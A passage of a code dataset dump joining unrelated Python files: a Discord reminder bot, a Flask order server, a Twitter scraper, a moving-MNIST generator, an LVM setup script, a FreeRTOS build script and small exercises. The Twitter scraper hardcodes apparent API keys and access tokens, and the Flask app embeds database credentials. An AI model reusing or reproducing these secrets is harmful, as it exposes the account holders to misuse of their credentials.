reminder[\"DUEDATE\"],\n self.bot.get_user(\n reminder[\"ID\"])))\n except (discord.errors.Forbidden, discord.errors.NotFound):\n to_remove.append(reminder)\n except discord.errors.HTTPException:\n pass\n else:\n to_remove.append(reminder)\n if not self.reminders:\n await ctx.send(\"Mission Accomplished..!! You don't have any more dues..!!\")\n\n @commands.command(name=\"clearreminders\", pass_context=True, help=\"deletes all reminders\")\n async def clearallreminders(self, ctx):\n \"\"\"\n Delete all the reminders.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n\n Returns:\n returns either an error stating a reason for failure or returns a\n success message stating that reminders have been deleted.\n\n \"\"\"\n to_remove = []\n for reminder in self.reminders:\n to_remove.append(reminder)\n for reminder in to_remove:\n self.reminders.remove(reminder)\n if to_remove:\n cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n os.chdir(cur_dir)\n json.dump(self.reminders, open(\"data/remindme/reminders.json\", \"w\"))\n await ctx.send(\"All reminders have been cleared..!!\")\n\n @commands.command(name=\"remindme\", pass_context=True,\n help=\"Request the bot to set a reminder for a due date\")\n async def remindme(self, ctx, quantity: int, time_unit: str, *, text: str):\n \"\"\"\n Personal remind me functionality.\n\n Parameters:\n ctx: used to access the values passed through the current context.\n quantity: time after which the data will be erased\n\n Returns:\n returns either an error stating a reason for failure or\n returns a success message stating that reminders have been deleted.\n\n \"\"\"\n time_unit = time_unit.lower()\n author = ctx.message.author\n s = \"\"\n if time_unit.endswith(\"s\"):\n time_unit = time_unit[:-1]\n s = \"s\"\n if not time_unit in self.units:\n await ctx.send(\n \"Invalid unit of time. Select from seconds/minutes/hours/days/weeks/months\")\n return\n if quantity < 1:\n await ctx.send(\"Quantity must not be 0 or negative\")\n return\n if len(text) > 1960:\n await ctx.send(\"Text is too long.\")\n return\n\n seconds = self.units[time_unit] * quantity\n future = int(time.time() + seconds)\n\n self.reminders.append({\"ID\": author.id, \"FUTURE\": future, \"TEXT\": text})\n await ctx.send(\"I will remind you that in {} {}.\".format(str(quantity), time_unit + s))\n json.dump(self.reminders, open(\"data/remindme/reminders.json\", \"w\"))\n\n @commands.Cog.listener()\n async def on_command_error(self, ctx, error):\n \n \n await ctx.send(\n '\\nUnidentified command... Refer to $help to get the list of available commands')\n\n async def delete_old_reminders(self):\n \"\"\"\n asynchronously keeps on tracking the json file for expired reminders and cleans them.\n\n Parameters:\n\n Returns:\n return nothing as this is task to delete the old reminders.\n\n \"\"\"\n while self is self.bot.get_cog(\"Deadline\"):\n to_remove = []\n for reminder in self.reminders:\n if reminder[\"FUTURE\"] <= int(time.time()):\n try:\n print(\"Deleting an old reminder..!!\")\n except (discord.errors.Forbidden, discord.errors.NotFound):\n to_remove.append(reminder)\n except discord.errors.HTTPException:\n pass\n else:\n to_remove.append(reminder)\n for reminder in to_remove:\n self.reminders.remove(reminder)\n if to_remove:\n cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n os.chdir(cur_dir)\n json.dump(self.reminders, open(\"data/remindme/reminders.json\", \"w\"))\n await asyncio.sleep(5)\n\n\ndef check_folders():\n \"\"\"checks if the folder that is going to hold json exists else creates a new one.\"\"\"\n cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n os.chdir(cur_dir)\n if not os.path.exists(\"data/remindme\"):\n print(\"Creating data/remindme folder...\")\n os.makedirs(\"data/remindme\")\n\n\ndef check_files():\n \"\"\"checks if a json file exists else creates a new one\"\"\"\n cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n os.chdir(cur_dir)\n f = \"data/remindme/reminders.json\"\n print(\"Creating file...\")\n if not os.path.exists(f):\n print(\"Creating empty reminders.json...\")\n json.dump([], open(f, \"w\"))\n\n\ndef setup(bot):\n \"\"\"add the file to the bot's cog system\"\"\"\n check_folders()\n check_files()\n n = Deadline(bot)\n loop = asyncio.get_event_loop()\n loop.create_task(n.delete_old_reminders())\n bot.add_cog(n)\n","sub_path":"cogs/deadline.py","file_name":"deadline.py","file_ext":"py","file_size_in_byte":18128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"416340279","text":"from flask import Flask, jsonify\nfrom flask import make_response, abort, request\n#from flaskext.mysql import MySQL\nimport uuid\nimport threading\nimport time\nimport random\n\n#mysql = MySQL()\njobs = []\nlogs = []\norder_id = 0\nclass FlaskApp(Flask):\n def __init__(self, *args, **kwargs):\n super(FlaskApp, self).__init__(*args, **kwargs)\n self._activate_background_job()\n\n def _activate_background_job(self):\n def run_job():\n global jobs, order_id\n time.sleep(1)\n while True:\n # check if there is enough jobs in the job queue\n num = -1\n\n #con = mysql.connect()\n #cur = con.cursor()\n\n try:\n #cur.execute('''select * from rsd2018.jobs''')\n num = len(jobs)\n except Exception as e:\n err_str = \"Problem accesing sql: \" + str(e)\n print(err_str)\n\n #print(\"There are \" + str(num) + \" jobs in queue\")\n\n if num >= 0 and num < 20:\n # insert a new order in the system\n params = (\n random.randint(0, 4),\n random.randint(0, 3),\n random.randint(0, 2)\n )\n\n #what is all three are zero?\n if params[0] == 0 and params[1] == 0 and params[2] == 0:\n params = (1, 0, 0)\n\n try:\n #cur.execute(insert_stmt, params)\n #con.commit()\n job = {\"red\": params[0],\n \"blue\": params[1],\n \"yellow\":params[2],\n \"time\": time.time(),\n \"status\":1,\n \"order_id\": order_id}\n order_id += 1\n jobs.append(job)\n except Exception as e:\n err_str = \"Problem inserting jobs: \" + str(e)\n print(err_str)\n\n #cur.close()\n\n time.sleep(2)\n\n t1 = threading.Thread(target=run_job)\n t1.start()\n\napp = FlaskApp(__name__)\n#app = Flask(__name__)\n\n\n# MySQL configurations\napp.config['MYSQL_DATABASE_USER'] = 'rsd'\napp.config['MYSQL_DATABASE_PASSWORD'] = 'rsd2018'\napp.config['MYSQL_DATABASE_DB'] = 'rsd2018'\napp.config['MYSQL_DATABASE_HOST'] = 'localhost'\n\nEventTypes = [\n \"PML_Idle\",\n \"PML_Execute\",\n \"PML_Complete\",\n \"PML_Held\",\n \"PML_Suspended\",\n \"PML_Aborted\",\n \"PML_Stopped\",\n \"Order_Start\",\n \"Order_Done\"\n\t]\n\nStatusText = [\n \"undefined\",\n \"ready\",\n \"taken\"\n ]\n\n#mysql.init_app(app)\n\nclass InvalidUsage(Exception):\n status_code = 400\n\n def __init__(self, message, status_code=None, payload=None):\n Exception.__init__(self)\n self.message = message\n if status_code is not None:\n self.status_code = status_code\n self.payload = payload\n\n def to_dict(self):\n rv = dict(self.payload or ())\n rv['message'] = self.message\n return rv\n\n@app.errorhandler(InvalidUsage)\ndef handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(jsonify({'error': 'Not found'}), 404)\n\n\n@app.route('/')\ndef get_log():\n global logs\n return jsonify({'logs' : logs})\n\n\n\n@app.route('/log', methods=['POST'])\ndef postlog_entry():\n global logs\n if not request.json:\n raise InvalidUsage('Missing json content', status_code=400)\n\n if 'cell_id' in request.json:\n if type(request.json['cell_id']) is not int:\n raise InvalidUsage('cell_id type is not int', status_code=400)\n else:\n raise InvalidUsage('Missing cell_id in content', status_code=400)\n\n if 'comment' in request.json:\n if type(request.json['comment']) is not str:\n raise InvalidUsage('comment type is not str', status_code=400)\n else:\n raise InvalidUsage('Missing comment in content', status_code=400)\n\n if 'event' in request.json:\n if type(request.json['event']) is not str:\n raise InvalidUsage('event type is not str', status_code=400)\n else:\n raise InvalidUsage('Missing event in content', status_code=400)\n\n event_str = request.json.get('event')\n\n if not event_str in EventTypes:\n raise InvalidUsage('event is not of legal type', status_code=400)\n\n params = (\n request.json.get('cell_id'),\n request.json.get('comment'),\n EventTypes.index(event_str)\n )\n\n insert_stmt = (\"INSERT INTO rsd2018.log (time, cell_id, comment, event) \"\n \"VALUES (CURRENT_TIMESTAMP, %s, %s, %s)\"\n )\n\n try:\n log = {'time': time.time(), 'cell_id': params[0], 'comment': params[1], 'even': params[2]}\n logs.append(log)\n except Exception as e:\n err_str = \"Problem inserting into db: \" + str(e)\n raise InvalidUsage(jsonify({'sql error': err_str}), status_code=500)\n\n return jsonify({'log_entry': len(logs)})\n\n@app.route('/event_types', methods=['GET'])\ndef get_event_types():\n return jsonify({'EventTypes' : EventTypes})\n\n@app.route('/orders', methods=['GET'])\ndef get_orders():\n global jobs\n r = []\n\n for job in jobs:\n r.append({'id':job[\"order_id\"], 'blue':job[\"blue\"], 'red':job[\"red\"], 'yellow':job[\"yellow\"], 'status':StatusText[job[\"status\"]]})\n\n return jsonify({'orders' : r})\n\n@app.route('/orders/', methods=['GET'])\ndef get_order(order_id):\n return jsonify({'order': order_id})\n\n@app.route('/orders/', methods=['PUT'])\ndef update_order(order_id):\n global jobs\n try:\n for index, order in enumerate(jobs):\n if order[\"order_id\"] == order_id:\n break\n\n except Exception as e:\n err_str = \"Problem selecting order_id: \" + str(e)\n raise InvalidUsage(jsonify({'sql error': err_str}), status_code=500)\n\n if jobs[index]['status'] == 2: # check if the job is already taken\n raise InvalidUsage('Order is taken and not ready', status_code=400)\n\n try:\n jobs[index]['status'] = 2\n except Exception as e:\n err_str = \"Problem updating order_id: \" + str(e)\n raise InvalidUsage(jsonify({'sql error': err_str}), status_code=500)\n\n # now generate the ticket, and insert it into the db\n ticket = uuid.uuid4().hex.upper()[0:6]\n ticket_update_stmt = (\"update rsd2018.jobs set ticket = %s where id = %s\")\n\n try:\n jobs[index]['ticket'] = ticket\n except Exception as e:\n err_str = \"Problem updating order_id: \" + str(e)\n raise InvalidUsage(jsonify({'sql error': err_str}), status_code=500)\n\n return jsonify({'ticket': ticket})\n\n@app.route('/orders/', methods=['DELETE'])\ndef delete_order(order_id):\n global jobs\n if not request.json:\n raise InvalidUsage('Missing json content', status_code=400)\n\n if 'ticket' in request.json:\n if type(request.json['ticket']) is not str:\n raise InvalidUsage('ticket type is not str', status_code=400)\n else:\n raise InvalidUsage('Missing ticket in content', status_code=400)\n\n #TODO: we need to check is the ticket is the same as in the db\n\n try:\n for index, job in enumerate(jobs):\n if index == order_id:\n break\n del jobs[index]\n except Exception as e:\n err_str = \"Problem selecting order_id: \" + str(e)\n raise InvalidUsage(jsonify({'sql error': err_str}), status_code=500)\n\n return jsonify({'deleted': order_id})\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","sub_path":"PackML/mes/rsd_2018_app.py","file_name":"rsd_2018_app.py","file_ext":"py","file_size_in_byte":7848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"508959312","text":"# -*- coding: utf-8 -*-\n#list of list\nl = [1,2,3]\nm = [[1,3,5],[3,4,5],l]\nprint(m)\n#l[1]=100\n#birden fazla yapida eleman tutmaya yariyor.\n#birinci kolonda maaslar ikinci kolonda adresler gibi birden fazla veri lazım oldugu zaman kullanilir.\np = [[row[i] for row in m] for i in range(3)] #matrixi transpoze ettik.\n#birinci satirin ilk elemanini alıyor. bir row olusturuyor birinci elemanlardan.\nprint(p)\n\n\n","sub_path":"16701025/listelist.py","file_name":"listelist.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"51334393","text":"import time\nstart_counting = time.time()\nimport csv\nimport tweepy\n\nconsumer_key = 'oSYrCa75rIA7E3a8LSbBvJxPe'\nconsumer_secret = 'GJAf741pOWPsRD6ZJ0e8QlYrnCDcPIbE579eNyZOaY9Fe9fByh'\naccess_token = '2987300974-18sYqXpFrlIPVgj84L9dBwoioFNWjzhaz3ubzVD'\naccess_token_secret = 'mAfnM2p6SyLpkDuwBFobYi2f2HJHtf4zN9uSqTI84PlVZ'\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth, wait_on_rate_limit=True)\n\n# Open/Create a file to append data\ncsvFile = open('OutputData/CryptoTweetDataNoRetweetsID.csv', 'a')\n\n# Use csv Writer\ncsvWriter = csv.writer(csvFile)\n\n# specify the search titles, result types data and exclude retweets.\n\nfor tweet in tweepy.Cursor(api.search, q=\"bitcoin OR cryptocurrency OR cryptomarket -filter:retweets\",\n result_type=\"mixed\",\n since_id=1240322076734610000,\n count=100,\n lang=\"en\").items():\n # print output of the section and save the outcomes to a csv file.\n print(tweet.created_at, tweet.text)\n csvWriter.writerow([tweet.id, tweet.created_at, tweet.text.encode('utf-8')])\n\nprint('It took {0:0.1f} seconds'.format(time.time() - start_counting))","sub_path":"DataCollection(Tweet).py","file_name":"DataCollection(Tweet).py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"65315420","text":"#Competitive Coding 3\n#Problem1 : https://leetcode.com/problems/k-diff-pairs-in-an-array/\n#All test cases passed on Leetcode\n#Time Complexity-O(NlogN)\n#Space Complexity-O(1)\n\nclass Solution:\n def findPairs(self, nums, k):\n #Approach:Sort the array\n #take Two pointers :slow and fast pointer , take difference between the values at slow and fast pointer and check below cases\n #3 cases:diffk and diff==k\n #for uniqueness :check value at fast-1 and fast positions , if there are same -fast+=1\n \n nums.sort()\n #initializations\n #to maintain count of unique k-dff pairs in the array\n count=0 \n slow=0\n fast=0\n n=len(nums)\n \n #we do exit the loop when slow or fast is greater than n\n while slowk\n elif diff>k:\n slow+=1\n #case 3: diff==k\n else:\n slow+=1\n fast+=1\n count+=1\n while fast= 0:\n action_vectors[img_idx][frame_idx][1] = 1\n elif motion_dict[i][\"veloc\"][1] < 0:\n action_vectors[img_idx][frame_idx][0] = 1\n elif motions[i] == \"horizontal\":\n canv.paste(images[i], (int(positions[i][0]), int(positions[i][1])))\n if motion_dict[i][\"veloc\"][0] >= 0:\n action_vectors[img_idx][frame_idx][3] = 1\n elif motion_dict[i][\"veloc\"][0] < 0:\n action_vectors[img_idx][frame_idx][2] = 1\n canvas += arr_from_img(canv, mean=0)\n\n for i in range(len(digits)):\n if motions[i] in [\"vertical\", \"horizontal\", \"zigzag\"]:\n for j in range(2):\n new_pos = positions[i][j] + motion_dict[i][\"veloc\"][j]\n if new_pos < -2 or new_pos > lims[j] + 2:\n motion_dict[i][\"veloc\"][j]*=-1\n positions[i][j] += motion_dict[i][\"veloc\"][j]\n elif motions[i] in [\"circular_clockwise\", \"circular_anticlockwise\"]:\n motion_dict[i][\"theta\"] += motion_dict[i][\"angular_velocity\"]\n r = motion_dict[i][\"r\"]\n theta = motion_dict[i][\"theta\"]\n positions[i][0] = width//2 + r*math.cos(theta) - original_size//2\n positions[i][1] = height//2 - r*math.sin(theta) - original_size//2\n elif motions[i] == \"tofro\":\n if motion_dict[i][\"waxing\"]:\n motion_dict[i][\"size\"]+=motion_dict[i][\"size_step\"]\n newX = motion_dict[i][\"center_x\"] - motion_dict[i][\"size\"]//2\n newY = motion_dict[i][\"center_y\"] - motion_dict[i][\"size\"]//2\n if newX < -2 or newX > (width - motion_dict[i][\"size\"]) + 2 or newY < -2 or newY > (height - motion_dict[i][\"size\"]) + 2:\n motion_dict[i][\"waxing\"] = False\n else:\n motion_dict[i][\"size\"]-=motion_dict[i][\"size_step\"]\n if motion_dict[i][\"size\"] == original_size:\n motion_dict[i][\"waxing\"] = True\n\n # Add the canvas to the dataset array\n dataset[img_idx * num_frames + frame_idx] = (canvas * 255).clip(0, 255).astype(np.uint8)\n\n return dataset, action_vectors\n\ndef tack_on(digit, motion, caption):\n caption += ' digit {} is moving'.format(digit)\n if motion == \"vertical\":\n caption += ' up and down'\n elif motion == \"horizontal\":\n caption += ' left and right'\n elif motion == \"circular_clockwise\":\n caption += ' clockwise in a circle'\n elif motion == \"circular_anticlockwise\":\n caption += ' anti-clockwise in a circle'\n elif motion == \"zigzag\":\n caption += ' in a zigzag path'\n elif motion == \"tofro\":\n caption += ' to and fro'\n return caption\n\ndef main(digits, motions, dest, frame_size=64, num_frames=30, num_sequences=1, original_size=28):\n\n assert len(digits) > 0, \"Need at least one digit\"\n\n\n dat, action_vectors = generate_moving_mnist(shape=(frame_size, frame_size), num_frames=num_frames, num_sequences=num_sequences,\n digits=digits, motions=motions, original_size=original_size)\n\n caption = tack_on(digits[0], motions[0], 'The')\n if len(digits) > 1:\n for i in range(1, len(digits)):\n caption += ' and the'\n caption = tack_on(digits[i], motions[i], caption)\n caption += '.'\n\n fcount = len(os.listdir(dest))\n\n f = open(os.path.join(dest, 'captions.txt'), 'a')\n for i in range(num_sequences):\n image_dir = os.path.join(dest, '{}'.format(fcount))\n fcount += 1\n os.makedirs(image_dir)\n for j in range(num_frames):\n Image.fromarray(get_image_from_array(dat, i*num_frames+j, mean=0)).save(os.path.join(image_dir, '{}.jpg'.format(j)))\n f.write('{},{}\\n'.format(image_dir, caption))\n with open(os.path.join(image_dir, 'actions.pkl'.format(i)), 'wb') as action_f:\n pickle.dump(action_vectors[i], action_f)\n f.close()\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser(description='Command line options')\n # The 'dest' argument is the directory in which to store the generated GIFs\n # The 'num_gifs' argument is the no. of GIFs to create\n parser.add_argument('--dest', type=str, dest='dest', default='movingmnist')\n parser.add_argument('--num_gifs', type=int, dest='num_gifs', default=1) # number of sequences to generate\n args = vars(parser.parse_args(sys.argv[1:]))\n\n dest = args['dest']\n num_sequences = args['num_gifs']\n\n # Create directory and the captions file\n if not os.path.exists(dest):\n os.makedirs(dest)\n\n if not os.path.exists(os.path.join(dest, 'captions.txt')):\n open(os.path.join(dest, 'captions.txt'), 'x')\n\n allowed_motions = [\"vertical\", \"horizontal\", \"circular_clockwise\", \"circular_anticlockwise\", \"zigzag\", \"tofro\"]\n\n\n digits = [0]\n motions = [\"vertical\", \"horizontal\"]\n\n main(digits, motions, dest, num_sequences=num_sequences)\n","sub_path":"moving_mnist.py","file_name":"moving_mnist.py","file_ext":"py","file_size_in_byte":12980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"406178496","text":"import os\nimport getpass\n\nos.system(\"tput bold\")\nos.system(\"tput setaf 1\")\nprint(\"\\t\\t\\tLogical Volume Management\")\nos.system(\"tput setaf 7\")\n\nprint(\"\\t\\t\\t------------------------\")\n\npasswd = getpass.getpass(\"Enter the password: \")\napass = \"mb\"\n\nif passwd != apass:\n\tprint(\"Access Denied\")\n\texit()\n\nprint(\"Where you would like to perform your job(local/remote)?\",end=' ')\nlocation = input()\nprint(location)\n\nif location == \"remote\":\n\tremoteIP = input(\"Enter the IP Address: \")\n\ndef lvm_automate():\n\tos.system(\"tput setaf 2\")\n\tprint(\"Displaying the Available Disks\")\n\tos.system(\"fdisk -l\")\n\tnum = int(input(\"How many disks you want to combine into a single Volume Group:\"))\n\tdisks = []\n\n\tfor i in range(num):\n\t\tdisk = input(f\"Enter the {i+1} disk name of which you would like to create a Physical Volume: \")\n\t\tdisks.append(disk)\n\t\ttry:\n\t\t\tos.system(f\"pvcreate {disk}\")\n\t\texcept:\n\t\t\tprint(\"Error Occured!! Could not create a Physical Volume!!\")\n\t\telse:\n\t\t\tos.system(\"tput setaf 3\")\n\t\t\tprint(\"Successfully created The Physical Volume!!\")\n\n\t\tos.system(f\"pvdisplay {disk}\")\n\t\n\tlength = len(disks)\n\tprint(\"Number of disks: \", length)\n\n\tvg_name = input(\"Enter the name of the Volume Group: \")\n\ttry:\n\t\tos.system(f\"vgcreate {vg_name} {disks[0]} {disks[1]}\")\n\texcept:\n\t\tprint(\"Error Occurred!!\")\n\telse:\n\t\tprint(\"Successfully created Volume Group\")\n\n\tlv_name = input(\"Enter the name of the Logical Volume: \")\n\tsize = int(input(\"Enter the size of the Logical Volume: \"))\n\ttry:\n\t\tos.system(f\"lvcreate --size {size} --name {lv_name} {vgname}\")\n\texcept:\n\t\tprint(\"Error occurred!!\")\n\telse:\n\t\tprint(\"Successfully created the Logical Volume!!\")\n\t\n\tos.system(\"tput setaf 2\")\n\tprint(\"Displaying the details of the Logical Volume\")\n\tos.system(f\"lvdisplay {vg_name}/{lv_name}\")\n\t\n\tos.system(\"tput setaf 3\")\n\tprint(\"Formatting the Logical Volume...\")\n\tos.system(f\"mkfs.ext4 /dev/{vg_name}/{lv_name}\")\n\t\n\tdir_loc = input(\"Enter the Directory location which you want to mount with the Logical Volume: \")\n\ttry:\n\t\tos.system(f\"mount /dev/{vg_name}/{lv_name} {dir_loc}\")\n\texcept:\n\t\tprint(\"Error occurred!!\")\n\telse:\n\t\tos.system(\"tput setaf 2\")\n\t\tprint(\"Successfully mounted the Directory\")\n\n\tprint(\"Displaying information about the Disks...\")\n\tos.system(\"df -h\")\n\ndef lvm_extend():\n\tvg_name = input(\"Enter the name of the Volume Group: \")\n\tlv_name = input(\"Enter the name of the Logical Volume: \")\n\tsize = int(input(\"Enter the size of the Logical Volume: \"))\n\ttry:\n\t\tos.system(f\"lvextend --size {size} /dev/{vg_name}/{lv_name}\")\n\texcept:\n\t\tprint(\"Error occurred!!\")\n\telse:\n\t\tprint(\"Size of Logical Volume Changed!!\")\n\t\n\tprint(\"Formatting the remaining portion of the Logical Memory...\")\n\ttry:\n\t\tos.system(f\"resize2fs /dev/{vg_name}/{lv_name}\")\n\texcept:\n\t\tprint(\"Error Occurred!!\")\n\telse:\n\t\tprint(\"Successfully formatted the remaining portion!!\")\n\nwhile True:\n\t\n\tprint(\"1. Logical Volume Management\")\n\tprint(\"2. Extend Logical Volume\")\n\tprint(\"Enter Your Choice: \",end=' ')\n\tch = input()\n\n\tif int(ch) == 1:\n\t\tlvm_automate()\n\telif int(ch) == 2:\n\t\tlvm_extend()\n\n\tinput(\"Enter to continue...\")\t\n\tos.system(\"clear\")\n\n\n\n","sub_path":"lvm-automation.py","file_name":"lvm-automation.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"292456369","text":"# Multiple Regression.\n\nfrom sklearn import linear_model\nfrom decimal import Decimal\nimport json\n\n\ndata = json.loads(open('data1.json', 'r').read())['data']\n\nX = []\nY = []\n\nfor obj in data:\n arr = obj['metadata'][:3]\n arr.append(obj['metadata'][-1])\n X.append(arr)\n layout = []\n for arr in obj['duration']:\n layout.append(arr[4] + arr[5])\n layout.sort(reverse=True)\n Y.append(sum(layout[:5]))\n\nlr = linear_model.LinearRegression()\nlr.fit(X, Y)\n\noutput = open('coef.txt', 'w')\nfor v in lr.coef_:\n v_ = Decimal(v).quantize(Decimal('1.00'))\n output.write(str(v_))\n output.write('\\n')\noutput.close()\n","sub_path":"analyze/mr.py","file_name":"mr.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"16596744","text":"def pierwsze(n):\n lista = []\n flaga = 0\n for i in range(2,n+1):\n for j in range(2,i):\n if i%j == 0:\n flaga = 1\n if flaga == 0:\n lista.append(i)\n else:\n flaga = 0\n return lista\n\n\n\nkotek = pierwsze(100)\nprint(kotek)","sub_path":"lek3.py","file_name":"lek3.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"356184034","text":"import os\n\nImport(\"env\")\n\n# Note: \"riscv-fw-infrastructure\" repository contains toolchains and eclipse\nFW_DIR = os.path.join(\n \"$PROJECT_CORE_DIR\", \"packages\", \"riscv-fw-infrastructure\", \"WD-Firmware\"\n)\n\nboard = env.BoardConfig()\nvariant_dir = os.path.join(FW_DIR, \"board\", board.get(\"build.variant\", \"\"))\n\nenv.Append(\n ASFLAGS=[\n \"-x\", \"assembler-with-cpp\",\n \"-Wa,-march=%s\" % board.get(\"build.march\")\n ],\n\n CCFLAGS=[\n \"-Os\",\n \"-Wall\",\n \"-ffunction-sections\",\n \"-fdata-sections\",\n \"-march=%s\" % board.get(\"build.march\"),\n \"-mabi=%s\" % board.get(\"build.mabi\"),\n \"-mcmodel=%s\" % board.get(\"build.mcmodel\"),\n \"-fno-builtin-printf\",\n ],\n CPPDEFINES=[\n \"D_USE_RTOSAL\",\n \"D_USE_FREERTOS\",\n (\"D_TICK_TIME_MS\", 4),\n (\"D_ISR_STACK_SIZE\", 400),\n (\"D_MTIME_ADDRESS\", \"0x80001020\"),\n (\"D_MTIMECMP_ADDRESS\", \"0x80001028\"),\n (\"D_CLOCK_RATE\", 50000000),\n (\"D_PIC_BASE_ADDRESS\", \"0xA0000000\"),\n (\"D_PIC_NUM_OF_EXT_INTERRUPTS\", 256),\n (\"D_EXT_INTERRUPT_FIRST_SOURCE_USED\", 0),\n (\"D_EXT_INTERRUPT_LAST_SOURCE_USED\", 255),\n ],\n\n CPPPATH=[\n \"$PROJECT_SRC_DIR\",\n os.path.join(FW_DIR, \"rtos\", \"rtosal\", \"loc_inc\"),\n os.path.join(FW_DIR, \"common\", \"api_inc\"),\n os.path.join(FW_DIR, \"rtos\", \"rtos_core\", \"freertos\", \"Source\", \"include\"),\n os.path.join(FW_DIR, \"rtos\", \"rtosal\", \"api_inc\"),\n os.path.join(FW_DIR, \"rtos\", \"rtosal\", \"config\", \"swerv_eh1\"),\n os.path.join(FW_DIR, \"psp\", \"api_inc\"),\n os.path.join(FW_DIR, \"rtos\", \"rtos_core\", \"freertos\", \"Source\", \"include\"),\n ],\n\n LINKFLAGS=[\n \"-Os\",\n \"-march=%s\" % board.get(\"build.march\"),\n \"-mabi=%s\" % board.get(\"build.mabi\"),\n \"-mcmodel=%s\" % board.get(\"build.mcmodel\"),\n \"-Wl,-gc-sections\",\n \"-nostdlib\",\n \"-nostartfiles\",\n \"-static\",\n \"-Wl,--wrap=malloc\",\n \"-Wl,--wrap=free\",\n \"-Wl,--wrap=open\",\n \"-Wl,--wrap=lseek\",\n \"-Wl,--wrap=read\",\n \"-Wl,--wrap=write\",\n \"-Wl,--wrap=fstat\",\n \"-Wl,--wrap=stat\",\n \"-Wl,--wrap=close\",\n \"-Wl,--wrap=link\",\n \"-Wl,--wrap=unlink\",\n \"-Wl,--wrap=execve\",\n \"-Wl,--wrap=fork\",\n \"-Wl,--wrap=getpid\",\n \"-Wl,--wrap=kill\",\n \"-Wl,--wrap=wait\",\n \"-Wl,--wrap=isatty\",\n \"-Wl,--wrap=times\",\n \"-Wl,--wrap=sbrk\",\n \"-Wl,--wrap=_exit\"\n \"-Wl,-Map=\"\n + os.path.join(\"$BUILD_DIR\", os.path.basename(env.subst(\"${PROJECT_DIR}.map\"))),\n \"-Wl,--defsym=__comrv_cache_size=0\",\n ],\n\n LIBPATH=[variant_dir],\n\n LIBS=[\"c\", \"gcc\"]\n)\n\n# copy CCFLAGS to ASFLAGS (-x assembler-with-cpp mode)\nenv.Append(ASFLAGS=env.get(\"CCFLAGS\", [])[:])\n\n# Only for C/C++ sources\nenv.Append(CCFLAGS=[\"-include\", \"sys/cdefs.h\"])\n\nif not board.get(\"build.ldscript\", \"\"):\n env.Replace(LDSCRIPT_PATH=\"link.lds\")\n\n\n#\n# Target: Build libraries\n#\n\nlibs = []\n\nif \"build.variant\" in board:\n env.Append(CPPPATH=[variant_dir, os.path.join(variant_dir, \"bsp\")])\n libs.append(env.BuildLibrary(os.path.join(\"$BUILD_DIR\", \"BoardBSP\"), variant_dir))\n\nlibs.extend([\n env.BuildLibrary(\n os.path.join(\"$BUILD_DIR\", \"FreeRTOS\"),\n os.path.join(FW_DIR, \"rtos\", \"rtos_core\", \"freertos\", \"Source\"),\n src_filter=[\n \"-<*>\",\n \"+\",\n \"+\",\n \"+\",\n \"+\",\n \"+\",\n \"+\",\n ],\n ),\n\n env.BuildLibrary(\n os.path.join(\"$BUILD_DIR\", \"RTOS-AL\"),\n os.path.join(FW_DIR, \"rtos\", \"rtosal\"),\n src_filter=\"+<*> - -\",\n ),\n\n env.BuildLibrary(\n os.path.join(\"$BUILD_DIR\", \"PSP\"),\n os.path.join(FW_DIR, \"psp\"),\n src_filter=[\n \"-<*>\",\n \"+\",\n \"+\",\n \"+\",\n \"+\",\n \"+\"\n ],\n )\n])\n\nenv.Prepend(LIBS=libs)\n","sub_path":"examples/rtosal-freertos/build-freertos.py","file_name":"build-freertos.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"65232495","text":"# Set graph styling to common styles\nfrom matplotlib import pyplot as plt\nimport matplotlib\nimport seaborn as sns\nplt.style.use('seaborn-poster')\nmatplotlib.rcParams['font.family'] = 'League Spartan'\n\n# So I don't have to keep looking up how to do this...\ndef f_int(x):\n return format(int(x), ',')\n# some matplotlib functions pass in a position, which we don't need\ndef mf_int(x, pos):\n return f_int(x)\ndef format_axis_labels_with_commas(axis):\n axis.set_major_formatter(matplotlib.ticker.FuncFormatter(mf_int))\ndef format_plt_labels_with_commas(plt):\n # I have no idea what the 111 magic number is. It was in a quora post and seems to work.\n axis = plt.get_subplot(111)\n format_axis_labels_with_commas(axis)\ndef annotate(axis, text, xy, xy_text):\n axis.annotate(\"${:,}\".format(int(text)), xy=xy,\n xytext=xy_text,\n arrowprops=dict(facecolor='black', connectionstyle=\"arc3,rad=.2\"),\n fontsize=14)\n\ndef find_smallest(s):\n smallest = min(s)\n index_of = s.index(smallest)\n return(index_of, smallest)\n\ndef find_biggest(s):\n biggest = max(s)\n index_of = s.index(biggest)\n return(index_of, biggest)\n\ndef annotate_smallest(axis, s, location=None):\n (x, y) = find_smallest(s)\n if location == None:\n location = (x * Decimal('1.1'), y * Decimal('.9'))\n\n annotate(axis, y, (x, y), location)\n\ndef annotate_biggest(axis, s, location=None):\n (x, 